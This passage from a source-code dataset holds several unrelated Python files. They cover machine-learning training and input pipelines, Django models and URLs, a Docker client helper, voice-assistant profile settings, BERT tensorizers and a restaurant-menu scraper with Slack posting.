Loader.add_constructor("!DiceMetric", get_constructor(DiceMetric))
Loader.add_constructor(
    "!HausdorffDistanceMetric", get_constructor(HausdorffDistanceMetric)
)
# callbacks
Loader.add_constructor(
    "!LearningRateMonitor", get_constructor(LearningRateMonitor)
)
Loader.add_constructor("!ModelCheckpoint", get_constructor(ModelCheckpoint))
Loader.add_constructor(
    "!TensorBoardLogger", get_constructor(TensorBoardLogger)
)
Loader.add_constructor("!SaveValResults", get_constructor(SaveValResults))
def read_config(path):
    """Load a YAML experiment configuration from *path* using the extended Loader."""
    with open(path, "rb") as config_file:
        return yaml.load(config_file, Loader)
| StarcoderdataPython |
178234 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import argparse
import pandas as pd
import tensorflow as tf
# Show TF log messages at INFO level and above (training progress output).
tf.logging.set_verbosity(tf.logging.INFO)
# Feature columns of the Boston housing CSV files used as model inputs.
FEATURES = ["crim", "zn", "indus", "nox", "rm",
            "age", "dis", "tax", "ptratio"]
# Target column: median home value.
LABEL = "medv"
COLUMNS = FEATURES + [LABEL]
def input_fn(data_set):
    """Build the (features, labels) tensors tf.contrib.learn expects from a DataFrame."""
    features = {}
    for name in FEATURES:
        column = data_set[name].values
        # Each feature becomes a rank-2 column vector of shape (n_rows, 1).
        features[name] = tf.constant(column, shape=[column.shape[0], 1])
    return features, tf.constant(data_set[LABEL].values)
def main(_):
    """Train, evaluate and run predictions for a DNN regressor on the Boston data.

    The underscore parameter absorbs the argv list passed by tf.app.run.
    """
    # skiprows=1 drops the CSV header; names=COLUMNS reassigns column names.
    training_set = pd.read_csv("../../data/boston/boston_train.csv", skipinitialspace=True,
                               skiprows=1, names=COLUMNS)
    test_set = pd.read_csv("../../data/boston/boston_test.csv", skipinitialspace=True,
                           skiprows=1, names=COLUMNS)
    prediction_set = pd.read_csv("../../data/boston/boston_predict.csv", skipinitialspace=True,
                                 skiprows=1, names=COLUMNS)
    feature_cols = [tf.contrib.layers.real_valued_column(k) for k in FEATURES]
    # Two hidden layers of 10 ReLU units; checkpoints land in tmp/boston_model.
    regressor = tf.contrib.learn.DNNRegressor(feature_columns=feature_cols,
                                              hidden_units=[10, 10],
                                              model_dir="tmp/boston_model",
                                              activation_fn=tf.nn.relu,
                                              dropout=0.5,
                                              optimizer="Adam")
    print("Training...")
    regressor.fit(input_fn=lambda: input_fn(training_set), steps=FLAGS.train_steps)
    print("Eval...")
    # steps=1 evaluates the whole test set exactly once.
    ev = regressor.evaluate(input_fn=lambda: input_fn(test_set), steps=1)
    print("Evaluation: ", ev)
    loss_score = ev["loss"]
    print("Loss: {0:f}".format(loss_score))
    print("Predictions...")
    # predict() returns a generator; materialize it before printing.
    predict_result_list = regressor.predict(input_fn=lambda: input_fn(prediction_set))
    predictions = list(predict_result_list)
    print ("Predictions: {}".format(str(predictions)))
if __name__ == '__main__':
    # Parse the flags this script knows about; unrecognized arguments are
    # forwarded unchanged to tf.app.run / the main() callback.
    parser = argparse.ArgumentParser()
    parser.add_argument('--train_steps', type=int, default=1000,
                        help='The number of training steps')
    FLAGS, unparsed = parser.parse_known_args()
    tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| StarcoderdataPython |
142605 | # Generated by Django 3.1.12 on 2021-09-24 11:41
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
    # Auto-generated migration: introduces the Department model and gives
    # each Team an optional department foreign key (SET_NULL on delete).
    # Do not edit the operations of an applied migration.
    dependencies = [
        ('teams', '0001_squashed_0003_auto_20210325_0812'),
    ]
    operations = [
        migrations.CreateModel(
            name='Department',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('name', models.TextField(unique=True)),
            ],
        ),
        migrations.AddField(
            model_name='team',
            name='department',
            field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='teams', to='teams.department'),
        ),
    ]
| StarcoderdataPython |
1775917 | import pandas as pd
# Directory holding the pre-processed business data files.
data_path = 'data/'
# Module-level cache of the businesses table; filled by init_businesses().
business_df = None
def init_businesses():
    """Load the businesses table from data/df.csv into the module-level cache."""
    global business_df
    business_df = pd.read_csv(data_path + 'df.csv', sep='\t')
# Populate the cache eagerly at import time.
init_businesses()
def get_business_list(product):
    """Return the rows of the cached businesses table whose Product equals *product*."""
    matches_product = business_df['Product'] == product
    return business_df[matches_product]
| StarcoderdataPython |
1734817 | import os
import docker
# Lazily created module-wide singletons shared by the helpers below.
__docker_client = None
__management_network = None
def get_docker_client(cert_path, host_addr, host_port):
    """Return a shared TLS-authenticated Docker client, creating it on first call.

    cert_path : str
        Directory containing ca.pem, cert.pem and key.pem.
    host_addr : str
        Docker daemon host address.
    host_port : int or str
        Docker daemon port.

    NOTE(review): the client is cached module-wide, so the arguments of any
    later call are silently ignored — callers must always target the same
    host; verify that this is intended.
    """
    global __docker_client
    if __docker_client:
        return __docker_client
    # Mutual TLS: verify the daemon against ca.pem and authenticate with the
    # client certificate/key pair.
    tls_config = docker.tls.TLSConfig(
        ca_cert=os.path.join(cert_path, "ca.pem"),
        client_cert=(
            os.path.join(cert_path, "cert.pem"),
            os.path.join(cert_path, "key.pem")
        ),
        verify=True
    )
    __docker_client = docker.DockerClient(
        base_url="tcp://{addr_}:{port_}".format(
            addr_=host_addr,
            port_=host_port
        ),
        tls=tls_config,
        version="auto",
    )
    return __docker_client
def get_management_network():
    """Return the shared overlay management network, creating it on first call.

    Raises a plain Exception when no docker client has been created yet
    (get_docker_client must be called first).
    """
    global __management_network
    if __management_network:
        return __management_network
    if not __docker_client:
        raise Exception("Create a docker client first, before creating a network...")
    # Creates a new docker network to bridge the manager to the runners.
    __management_network = __docker_client.networks.create(
        name="pga-management",
        driver="overlay",
        check_duplicate=True,
        attachable=True,
        scope="swarm",
        labels={"PGAcloud": "PGA-Management"},
    )
    return __management_network
| StarcoderdataPython |
1615319 | """Settings for Rhasspy."""
import json
import logging
import os
from typing import Any, Dict, List
import pydash
from rhasspy.utils import recursive_update
# -----------------------------------------------------------------------------
# Module-level logger for profile loading/writing diagnostics.
logger = logging.getLogger(__name__)
class Profile:
    """Contains all settings for Rhasspy.

    Settings are layered: package defaults, then the system profile, then
    the user profile; later layers override earlier ones. The `layers`
    argument selects which layers are merged into `self.json`.
    """
    def __init__(
        self,
        name: str,
        system_profiles_dir: str,
        user_profiles_dir: str,
        layers: str = "all",
    ) -> None:
        self.name: str = name
        self.system_profiles_dir = system_profiles_dir
        self.user_profiles_dir = user_profiles_dir
        # Search order for reads/writes: user directory first, system second.
        self.profiles_dirs: List[str] = [user_profiles_dir, system_profiles_dir]
        self.layers: str = layers
        self.load_profile()
    # -------------------------------------------------------------------------
    @classmethod
    def load_defaults(cls, system_profiles_dir: str) -> Dict[str, Any]:
        """Load default profile settings."""
        defaults_path = os.path.join(system_profiles_dir, "defaults.json")
        with open(defaults_path, "r") as defaults_file:
            logging.debug("Loading default profile settings from %s", defaults_path)
            return json.load(defaults_file)
    # -------------------------------------------------------------------------
    def get(self, path: str, default: Any = None) -> Any:
        """Get setting by dotted path (pydash syntax, e.g. 'a.b.c')."""
        return pydash.get(self.json, path, default)
    def set(self, path: str, value: Any) -> None:
        """Set setting by dotted path (pydash syntax)."""
        pydash.set_(self.json, path, value)
    # -------------------------------------------------------------------------
    def load_profile(self) -> None:
        """Load defaults and user settings into self.json / self.system_json."""
        # Load defaults first
        self.json: Dict[str, Any] = {}  # no defaults
        self.system_json: Dict[str, Any] = {}  # no defaults
        if self.layers in ["all", "defaults"]:
            defaults_path = os.path.join(self.system_profiles_dir, "defaults.json")
            with open(defaults_path, "r") as defaults_file:
                self.json = json.load(defaults_file)
                # Re-read the same file for an independent copy (avoids the
                # two dicts sharing nested structures).
                defaults_file.seek(0)
                self.system_json = json.load(defaults_file)
        # Load just the system profile.json (on top of defaults)
        system_profile_path = os.path.join(
            self.system_profiles_dir, self.name, "profile.json"
        )
        with open(system_profile_path, "r") as system_profile_file:
            recursive_update(self.system_json, json.load(system_profile_file))
        # Overlay with profile
        self.json_path = self.read_path("profile.json")
        if self.layers in ["all", "profile"]:
            # Read in reverse order so user profile overrides system
            for profiles_dir in self.profiles_dirs[::-1]:
                json_path = os.path.join(profiles_dir, self.name, "profile.json")
                if os.path.exists(json_path):
                    with open(json_path, "r") as profile_file:
                        recursive_update(self.json, json.load(profile_file))
    def read_path(self, *path_parts: str) -> str:
        """Get first readable path in user then system directories."""
        for profiles_dir in self.profiles_dirs:
            # Try to find in the user profile first
            full_path = os.path.join(profiles_dir, self.name, *path_parts)
            if os.path.exists(full_path):
                return full_path
        # Use base dir
        # NOTE(review): the fallback keeps only the last path component,
        # unlike write_path which keeps all parts — confirm intentional.
        return os.path.join("profiles", self.name, path_parts[-1])
    def read_paths(self, *path_parts: str) -> List[str]:
        """Get all readable paths in user then system directories."""
        return_paths: List[str] = []
        for profiles_dir in self.profiles_dirs:
            # Try to find in the runtime profile first
            full_path = os.path.join(profiles_dir, self.name, *path_parts)
            if os.path.exists(full_path):
                return_paths.append(full_path)
        return return_paths
    def write_path(self, *path_parts: str) -> str:
        """Get first writeable path in user then system directories.

        Creates the parent directory as a side effect; falls back to the
        relative "profiles" directory when neither location is writable.
        """
        # Try to find in the runtime profile first
        for profiles_dir in self.profiles_dirs:
            full_path = os.path.join(profiles_dir, self.name, *path_parts)
            try:
                dir_path = os.path.split(full_path)[0]
                os.makedirs(dir_path, exist_ok=True)
                return full_path
            except Exception:
                # Deliberate best-effort: log and try the next directory.
                logger.exception("Unable to write to %s", full_path)
        # Use base dir
        full_path = os.path.join("profiles", self.name, *path_parts)
        dir_path = os.path.split(full_path)[0]
        os.makedirs(dir_path, exist_ok=True)
        return full_path
    def write_dir(self, *dir_parts: str) -> str:
        """Get first writeable directory in user then system directories.

        Creates the directory as a side effect; falls back to the relative
        "profiles" directory when neither location is writable.
        """
        # Try to find in the runtime profile first
        for profiles_dir in self.profiles_dirs:
            dir_path = os.path.join(profiles_dir, self.name, *dir_parts)
            try:
                os.makedirs(dir_path, exist_ok=True)
                return dir_path
            except Exception:
                # Deliberate best-effort: log and try the next directory.
                logger.exception("Unable to create %s", dir_path)
        # Use base dir
        dir_path = os.path.join("profiles", self.name, *dir_parts)
        os.makedirs(dir_path, exist_ok=True)
        return dir_path
| StarcoderdataPython |
3249917 | <reponame>wilmerm/unolet-2022
from django.urls import path
from person import views
# URL routes for the person app: person CRUD, identification-type update,
# and django-autocomplete-light endpoints.
urlpatterns = [
    path("person/create/", views.PersonCreateView.as_view(),
         name="person-person-create"),
    path("person/list/", views.PersonListView.as_view(),
         name="person-person-list"),
    path("person/list/<int:pk>/", views.PersonDetailView.as_view(),
         name="person-person-detail"),
    path("person/list/<int:pk>/update/", views.PersonUpdateView.as_view(),
         name="person-person-update"),
    path("person/list/<int:pk>/delete/", views.PersonDeleteView.as_view(),
         name="person-person-delete"),
    path("identificationtype/<int:pk>/update/",
         views.IdentificationTypeUpdateView.as_view(),
         name="person-identificationtype-update"),
    # django-autocomplete-light
    # NOTE(review): "autocomplete/person/list" lacks the trailing slash the
    # other routes have — confirm whether that is intentional.
    path("autocomplete/person/list", views.PersonAutocompleteView.as_view(),
         name="person-autocomplete-person"),
    path("autocomplete/identificationtype/list/",
         views.IdentificationTypeAutocompleteView.as_view(),
         name="person-autocomplete-identificationtype")
]
148827 | '''
pass_flatten_basic02.py
Copyright (c) Seoul National University
Licensed under the MIT license.
Author: <NAME>
Basic functionality check for torch.flatten.
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
# Build a 6-D tensor and flatten it to rank 1.
a = torch.rand(2, 3, 4, 5, 6, 7)
b = torch.flatten(a)
# Explicit shape assertion: flatten must collapse every dimension into one
# axis holding all 2*3*4*5*6*7 = 5040 elements. The original script relied
# only on the broadcast-add below failing, which gives a far less readable
# error message when the shape is wrong.
assert b.shape == (2 * 3 * 4 * 5 * 6 * 7,)
# Broadcast-add against a same-sized tensor; raises RuntimeError on mismatch.
b + torch.rand(7 * 6 * 5 * 4 * 3 * 2 * 1)
3337197 | <filename>spikey/snn/readout/template.py
"""
Translator from output neuron spike trains to actions
for the environment.
"""
import numpy as np
from spikey.module import Module, Key
class Readout(Module):
    """
    Translator from output neuron spike trains to actions
    for the environment.

    Parameters
    ----------
    kwargs: dict
        Dictionary with values for each key in NECESSARY_KEYS.

    Examples
    --------
    .. code-block:: python

        config = {
            "n_outputs": 10,
            "magnitude": 2,
        }
        readout = Readout(**config)
        readout.reset()

        action = readout(np.ones((10, config["n_outputs"])))
    """

    NECESSARY_KEYS = [
        Key("n_outputs", "Number of output neurons, a subset of body neurons.", int),
        Key("magnitude", "Spike fire magnitude.", float),
    ]

    def __init__(self, **kwargs):
        super().__init__(**kwargs)

    def reset(self):
        """
        Reset all readout members.
        Called at the start of each episode.
        """
        pass

    def __call__(self, output_spike_train: np.ndarray) -> object:
        """
        Interpret the output neurons' spike train.
        Called once per game step.

        Parameters
        ----------
        output_spike_train: np.ndarray[t, n_neurons], boolean dtype
            Spike train with train[-1] being the most recent time.

        Returns
        -------
        object Action chosen.
        """
        # BUGFIX: the annotation used to be `np.bool`, an alias deprecated in
        # NumPy 1.20 and removed in 1.24. Annotations here are evaluated at
        # class-definition time (no `from __future__ import annotations`), so
        # importing this module crashed on modern NumPy.
        raise NotImplementedError(f"__call__ not implemented for {type(self)}!")
| StarcoderdataPython |
3255075 | <filename>pytext/torchscript/tensorizer/bert.py
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from typing import List, Optional, Tuple
import torch
from pytext.torchscript.utils import pad_2d_mask
from pytext.torchscript.vocab import ScriptVocabulary
from .tensorizer import ScriptTensorizer, VocabLookup
class ScriptBERTTensorizerBase(ScriptTensorizer):
    # TorchScript-compatible BERT tensorizer base. The explicit local type
    # annotations and torch.jit.Attribute wrappers below are required by the
    # TorchScript compiler; keep them when modifying this class.
    def __init__(
        self,
        tokenizer: torch.jit.ScriptModule,
        vocab: ScriptVocabulary,
        max_seq_len: int,
        add_bos_token: bool,
        use_eos_token_for_bos: bool,
    ):
        super().__init__()
        self.tokenizer = tokenizer
        self.vocab = vocab
        self.vocab_lookup = VocabLookup(vocab)
        # Wrapped in torch.jit.Attribute so TorchScript records the types.
        self.max_seq_len = torch.jit.Attribute(max_seq_len, int)
        self.add_bos_token = torch.jit.Attribute(add_bos_token, bool)
        self.use_eos_token_for_bos = torch.jit.Attribute(use_eos_token_for_bos, bool)
    @torch.jit.script_method
    def numberize(self, row: List[str]) -> Tuple[List[int], List[int], int]:
        """Convert raw inputs into token ids by doing vocab look-up. It will also
        append bos & eos index into token ids if needed.

        Args:
            row: 1) a list of raw inputs, in most case it is a
                    single text or a pair of texts.
                 2) a list of preprocced tokens, we could still
                    apply other operations (for example: bpe) on it.

        Returns:
            a list of token ids after doing vocab lookup and segment labels.
        """
        token_ids: List[int] = []
        segment_labels: List[int] = []
        seq_len: int = 0
        per_sentence_tokens: List[List[Tuple[str, int, int]]] = self.tokenize(row)
        for idx, tokens in enumerate(per_sentence_tokens):
            # BOS is only prepended to the very first sentence (and only when
            # configured); every sentence gets an EOS via vocab_lookup.
            if idx == 0 and self.add_bos_token:
                bos_idx: Optional[int] = self.vocab.bos_idx
            else:
                bos_idx: Optional[int] = None
            lookup_ids: List[int] = self.vocab_lookup(
                tokens,
                bos_idx=bos_idx,
                eos_idx=self.vocab.eos_idx,
                use_eos_token_for_bos=self.use_eos_token_for_bos,
                max_seq_len=self.max_seq_len,
            )[0]
            token_ids.extend(lookup_ids)
            # Segment label = sentence index (0 for first text, 1 for second).
            segment_labels.extend([idx] * len(lookup_ids))
        seq_len = len(token_ids)
        return token_ids, segment_labels, seq_len
    @torch.jit.script_method
    def tensorize(
        self, rows: List[List[str]]
    ) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:
        """Convert multiple rows of raw inputs into model input tensors.

        Args:
            row: 1) each row is a list of raw inputs, in most case it is a
                    single text or a pair of texts.
                 2) each row is a list of preprocced tokens, we could still
                    apply other operations (for example: bpe) on it.

        Returns:
            model input tensors: padded token ids, padding mask and padded
            segment labels.
        """
        tokens_2d: List[List[int]] = []
        segment_labels_2d: List[List[int]] = []
        seq_len_2d: List[int] = []
        for row in rows:
            numberized: Tuple[List[int], List[int], int] = self.numberize(row)
            tokens_2d.append(numberized[0])
            segment_labels_2d.append(numberized[1])
            # NOTE(review): seq_len_2d is collected but never used/returned
            # here — confirm whether subclasses rely on it.
            seq_len_2d.append(numberized[2])
        tokens, pad_mask = pad_2d_mask(tokens_2d, pad_value=self.vocab.pad_idx)
        segment_labels, _ = pad_2d_mask(segment_labels_2d, pad_value=self.vocab.pad_idx)
        return tokens, pad_mask, segment_labels
class ScriptBERTTensorizer(ScriptBERTTensorizerBase):
    # Variant that tokenizes each raw text independently: one token list per
    # input sentence.
    @torch.jit.script_method
    def tokenize(self, row: List[str]) -> List[List[Tuple[str, int, int]]]:
        """Convert raw inputs into tokens.

        Args:
            row: a list of raw inputs, in most case it is a
                 single text or a pair of texts.

        Returns:
            a per sentence list of (token, start, end) tuples.
        """
        per_sentence_tokens: List[List[Tuple[str, int, int]]] = []
        for text in row:
            per_sentence_tokens.append(self.tokenizer.tokenize(text))
        return per_sentence_tokens
class ScriptBERTTokenTensorizer(ScriptBERTTensorizerBase):
    # Variant for pre-tokenized input: every raw token may still be split
    # further (e.g. by BPE), and all resulting tokens are merged into a
    # single "sentence".
    @torch.jit.script_method
    def tokenize(self, row: List[str]) -> List[List[Tuple[str, int, int]]]:
        """Convert raw inputs into tokens.

        Args:
            row: a list of preprocced tokens, we could still
                 apply other operations (for example: bpe) on it.

        Returns:
            a single-element list: all tokens of the row merged into one
            sentence-level token list.
        """
        per_sentence_tokens: List[Tuple[str, int, int]] = []
        for raw_token in row:
            per_sentence_tokens.extend(self.tokenizer.tokenize(raw_token))
        return [per_sentence_tokens]
| StarcoderdataPython |
1781768 | <gh_stars>1-10
#!/usr/bin/env python3
# Copyright (c) 2014-2020, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of kimenu nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
Main script for choosing what restaurant parsers to use
'''
import click
import os
import sys
import requests
import requests_cache
import json
import lunch_menu.parser as ps
# Directory containing this module; the restaurant registry lives next to it.
__location__ = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
REST_FILENAME = os.path.join(__location__, 'restaurants.txt')
def read_restaurants(intext):
    '''
    Parse the restaurant registry from tab-separated text.

    Each non-comment, non-empty line holds the columns:
    [0] campus [1] identifier [2] Name [3] URL [4] Menu URL [5] OSM URL

    Returns a dict mapping each identifier to its record dict.
    '''
    field_names = ('campus', 'identifier', 'name', 'url', 'menu_url', 'osm')
    registry = {}
    for raw_line in intext.split('\n'):
        # Skip blank lines and '#' comment lines.
        if not raw_line or raw_line.startswith('#'):
            continue
        record = dict(zip(field_names, raw_line.rstrip().split('\t')))
        registry[record['identifier']] = record
    return registry
# Load the restaurant registry once at import time. Using a context manager
# closes the file handle deterministically; the previous bare open() call
# leaked the handle until garbage collection (ResourceWarning).
with open(REST_FILENAME) as _restaurants_file:
    REST_DATA = read_restaurants(_restaurants_file.read())
# Maps restaurant identifiers to their parser functions.
# works as ordered dict as well, but must be _ordered_
MAPPER = {'jorpes': ps.parse_jorpes, 'glada': ps.parse_glada,
          'haga': ps.parse_haga, 'hjulet': ps.parse_hjulet,
          'jons': ps.parse_jons, 'livet': ps.parse_livet,
          'nanna': ps.parse_nanna, 'svarta': ps.parse_svarta,
          'bikupan': ps.parse_bikupan, 'dufva': ps.parse_dufva,
          'hubben': ps.parse_hubben, 'rudbeck': ps.parse_rudbeck,
          'elma': ps.parse_elma}
# Restaurant identifier groups per campus.
KI = ('jorpes', 'glada', 'haga', 'hjulet', 'jons',
      'livet', 'nanna', 'svarta')
UU = ('bikupan', 'dufva', 'hubben', 'rudbeck', 'elma')
ALL = KI + UU
def build_output(data, fmt):
    '''
    Render one restaurant's parsed data in the requested format.

    fmt is either 'html' (title/menu divs) or 'markdown' (bold title plus
    quoted menu lines); anything else raises NotImplementedError.
    '''
    if fmt == 'html':
        pieces = [
            f'''<div class="title"><a href="{data['url']}">{data['title']}</a>''',
            f'''(<a href="{data['map_url']}">{data['location']}</a>)</div>''',
            '<div class="menu">',
            '<p>',
            '<br />\n'.join(data['menu']),
            '</p>',
            '</div>',
        ]
    elif fmt == 'markdown':
        # Simple markdown-like format, e.g. for slack or a terminal.
        pieces = [f'*{data["title"]}*']
        for menu in data['menu']:
            pieces.append('> {}'.format(menu))
    else:
        raise NotImplementedError(fmt)
    return '\n'.join(pieces)
def activate_parsers(restaurants, restaurant_data, fmt='html'):
    '''
    Run the requested restaurant parsers and collect their rendered output.

    Failures are captured per restaurant and reported inline, so one broken
    parser does not take down the whole listing.
    '''
    rendered = []
    for restaurant in restaurants:
        try:
            parsed = MAPPER[restaurant](restaurant_data[restaurant])
            rendered.append(build_output(parsed, fmt))
        except Exception as err:
            # Deliberate best-effort: record the failure and keep going.
            rendered.append(f'E in {restaurant}: {err}\n')
    return rendered
def get_restaurant(name: str) -> dict:
    '''
    Fetch and parse the menu of a single restaurant.

    Returns an empty dict for unknown restaurant names.
    '''
    parser = MAPPER.get(name)
    if parser is None:
        return {}
    return parser(REST_DATA[name])
def list_restaurants():
    '''
    Return the metadata of every supported restaurant as a list.
    '''
    return [*REST_DATA.values()]
def page_end():
    '''
    Return the closing HTML lines: footer note plus end tags.
    '''
    return [
        ('<div class="endnote">Code available at '
         '<a href="https://github.com/talavis/lunch-menu">'
         'Github</a>. Patches are very welcome.</div>'),
        '</body>',
        '</html>',
    ]
def page_start(weekday, day, month):
    '''
    Return the opening HTML lines, including a dated <title>.
    '''
    date = f'{weekday.capitalize()} {day} {month}'
    return [
        '<html>',
        '<head>',
        f'<title>Dagens mat - {date}</title>',
        '<link href="styles.css" rel="stylesheet" type="text/css">',
        '<style type="text/css"></style>',
        '</head>',
        '<body>',
        # page formatting placeholder
        '',
    ]
def parse_restaurant_names(rest_names):
    '''
    Validate the requested restaurant names.

    Matching is case-insensitive; the returned list holds the canonical
    lower-case identifiers.

    Raises ValueError for the first name that is not a known restaurant.
    '''
    restaurants = list()
    for param in rest_names:
        # BUG FIX: normalise before validating. The original checked the raw
        # string against ALL but stored param.lower(), so a differently-cased
        # valid name (e.g. 'Jorpes') was rejected.
        name = param.lower()
        if name not in ALL:
            raise ValueError('{} not a valid restaurant'.format(param))
        restaurants.append(name)
    return restaurants
def gen_menu(restaurants, restaurant_data, fmt):
    '''
    Generate the combined menu for the given restaurants.

    For 'html' the per-restaurant sections are wrapped in a full page;
    other formats return the raw sections only.
    '''
    sections = activate_parsers(restaurants, restaurant_data, fmt)
    if fmt == 'html':
        header = page_start(ps.get_weekday(), str(ps.get_day()), ps.get_month())
        return '\n'.join(header + sections + page_end())
    return '\n'.join(sections)
def gen_ki_menu():
    '''
    Generate an HTML menu for the restaurants at KI.
    '''
    # BUG FIX: gen_menu() takes a mandatory fmt argument; the original
    # two-argument call raised TypeError on every invocation.
    return gen_menu(KI, REST_DATA, 'html')
def gen_uu_menu():
    '''
    Generate an HTML menu for the restaurants at UU.
    '''
    # BUG FIX: gen_menu() takes a mandatory fmt argument; the original
    # two-argument call raised TypeError on every invocation.
    return gen_menu(UU, REST_DATA, 'html')
@click.command()
@click.option('--cache/--no-cache', default=False, help='Cache web request for debugging')
@click.option('--slack-channel', help='Sends the data to the specified channel')
@click.option('--slack-user', help='Slack user that posts the message', default='lunchbot')
@click.option('--slack-emoji', help='Emoji for the post', default=':croissant:')
@click.option('--fmt', default='html', type=click.Choice(('html', 'markdown')), help='The format of the output')
@click.argument('restaurants', nargs=-1, type=click.Choice(('all', 'ki', 'uu') + ALL))
def main(restaurants, cache, slack_channel, slack_user, slack_emoji, fmt):
    '''Generates a report for the selected restaurant(s)'''
    if cache:
        # Caches all web requests in the file .devcache. Just for testing.
        requests_cache.install_cache('.devcache')
    # Expand the campus shorthands. Unlike the original if/elif chain, this
    # also honours combinations such as "ki uu" or "uu jorpes" instead of
    # silently dropping everything after the first matching shorthand.
    expansions = {'all': ALL, 'ki': KI, 'uu': UU}
    requested = []
    for name in restaurants:
        for expanded in expansions.get(name, (name,)):
            if expanded not in requested:
                requested.append(expanded)
    try:
        rest_names = parse_restaurant_names(requested)
    except ValueError as err:
        sys.stderr.write('E: {}\n'.format(err))
        print_usage((x for x in MAPPER))
        sys.exit(1)
    if slack_channel:
        # Slack posts are plain text, so force the markdown renderer.
        fmt = 'markdown'
    menu = gen_menu(rest_names, REST_DATA, fmt)
    if slack_channel:
        # BUG FIX: the '#' prefix must be added when it is *missing*; the
        # original condition was inverted and doubled an existing '#'.
        if not slack_channel.startswith('#'):
            slack_channel = '#' + slack_channel
        url = os.environ['LUNCH_MENU_SLACK_WEBHOOK']
        payload = json.dumps({'channel': slack_channel,
                              'username': slack_user,
                              'icon_emoji': slack_emoji,
                              'text': menu})
        post_response = requests.post(url, data=payload)
        print('Response[{}]: {}'.format(post_response.status_code, post_response.text))
    else:
        print(menu)
| StarcoderdataPython |
3229879 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Efficient input pipeline using tf.data.Dataset.
Original file:
https://github.com/tensorflow/tpu/blob/master/models/official/resnet/imagenet_input.py
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from functools import partial
import numpy as np
from sklearn.model_selection import train_test_split
import tensorflow as tf
DUMMY_SIRNA = 10000
def set_shapes(transpose_input, batch_size, images, labels):
    """Statically set the batch_size dimension.

    When transpose_input is True the batch is the last image axis (HWCN),
    otherwise it is the first one (NHWC).
    """
    batch_axis = 3 if transpose_input else 0
    image_dims = [None, None, None, None]
    image_dims[batch_axis] = batch_size
    images.set_shape(images.get_shape().merge_with(
        tf.TensorShape(image_dims)))
    labels.set_shape(
        labels.get_shape().merge_with(tf.TensorShape([batch_size])))
    return images, labels
def record_to_filename(record, url_base, site=1):
    """Build the TFRecord path for one (experiment, plate) record.

    record is indexable with the experiment name at [0] and the plate
    number at [1]; site selects the imaging site.
    """
    experiment, plate = record[0], record[1]
    return '{}/{}_p{}_s{}.tfrecord'.format(url_base, experiment, plate, site)
def get_tfrecord_names(url_base, df, split=False, valid_pct=0.2, sites=(1, 2), seed=None):
    """Build the TFRecord file names for every (experiment, plate) in df.

    url_base: prefix under which the record files live.
    df: metadata dataframe with 'experiment', 'plate' and 'sirna' columns.
    split: when True, return (train_files, valid_files) with a stratified
        hold-out; otherwise return a single array of file names.
    valid_pct: fraction of files held out for validation.
    sites: imaging sites to include; one file name per site and plate.
        (BUG FIX: changed from the mutable default [1, 2] to a tuple --
        mutable default arguments are shared across calls.)
    seed: random_state forwarded to train_test_split for reproducibility.
    """
    grouped = df.groupby(['experiment', 'plate'])
    train_files = []
    valid_files = []
    for site in sites:
        if split:
            # One row per (experiment, plate); 'sirna' is only used to
            # stratify the split.
            x = grouped.agg({'sirna': 'min'}).reset_index()
            files = x.apply(lambda row: record_to_filename(row, url_base=url_base, site=site), axis=1)
            labels = x['sirna']
            # NOTE(review): the same seed is reused for every site, which
            # presumably keeps both sites of a plate on the same side of the
            # split -- confirm this is intended.
            train, valid = train_test_split(files.values, test_size=valid_pct, random_state=seed, stratify=labels)
            train_files = np.concatenate([train_files, train])
            valid_files = np.concatenate([valid_files, valid])
        else:
            train = [record_to_filename(key, url_base=url_base, site=site) for key in grouped.groups.keys()]
            train_files = np.concatenate([train_files, train])
    if split:
        return train_files, valid_files
    return train_files
def parse(value, test=False):
    """Parse one serialized tf.Example from the cell-imaging TFRecords.

    value: scalar string tensor holding the serialized example.
    test: when True the record carries no 'sirna' label, so the dummy
        label DUMMY_SIRNA is substituted to keep the pipeline uniform.
    """
